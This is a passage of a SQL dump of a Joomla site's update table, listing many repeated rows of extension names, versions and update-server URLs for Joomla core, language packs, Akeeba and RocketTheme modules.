Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3761,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3762,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3763,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3764,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3765,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3766,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3767,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3768,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3769,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3770,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3771,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3772,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3773,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3774,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3775,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3776,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3777,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3778,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3779,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3780,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3781,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3782,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3783,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3784,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3785,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3786,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3787,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3788,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3789,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3790,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3791,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3792,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3793,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3794,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3795,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3796,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3797,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3798,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3799,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3800,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3801,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3802,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3803,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3804,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3805,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3806,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3807,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3808,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3809,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(3810,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(3811,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3812,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3813,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3814,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3815,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3816,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3817,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3818,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3819,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3820,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3821,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3822,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3823,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3824,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3825,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3826,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3827,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3828,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3829,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3830,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3831,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3832,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3833,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3834,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3835,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3836,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3837,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3838,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3839,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3840,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3841,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3842,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3843,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3844,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3845,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3846,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3847,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3848,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3849,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3850,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3851,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3852,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3853,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3854,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3855,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3856,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3857,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3858,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3859,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3860,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3861,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3862,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3863,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3864,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3865,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3866,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3867,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3868,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3869,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3870,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3871,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3872,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3873,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3874,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3875,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3876,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3877,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3878,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3879,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3880,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3881,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3882,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3883,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3884,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3885,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3886,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3887,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3888,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3890,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3891,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3892,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3893,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3894,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3895,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3896,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3897,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3898,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3899,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3900,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3901,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3902,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3903,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3904,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3905,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3906,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3907,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3908,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3909,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3910,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3911,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3912,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3913,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3914,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3915,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3916,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3917,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3918,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3919,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3920,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3921,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3922,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3923,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3924,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3925,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3926,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3927,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3928,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3929,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3930,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3931,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3932,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3933,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3934,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3935,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3936,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3937,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3938,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3939,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3940,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(3941,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(3942,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3943,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3944,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3945,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3946,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3947,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3948,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3949,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3950,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3951,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3952,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3953,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3954,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3955,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3956,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3957,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3958,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3959,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3960,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3961,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3962,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3963,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3964,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3965,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3966,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3967,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3968,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3969,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3970,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3971,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3972,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3973,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3974,3,0,'Persian','','pkg_fa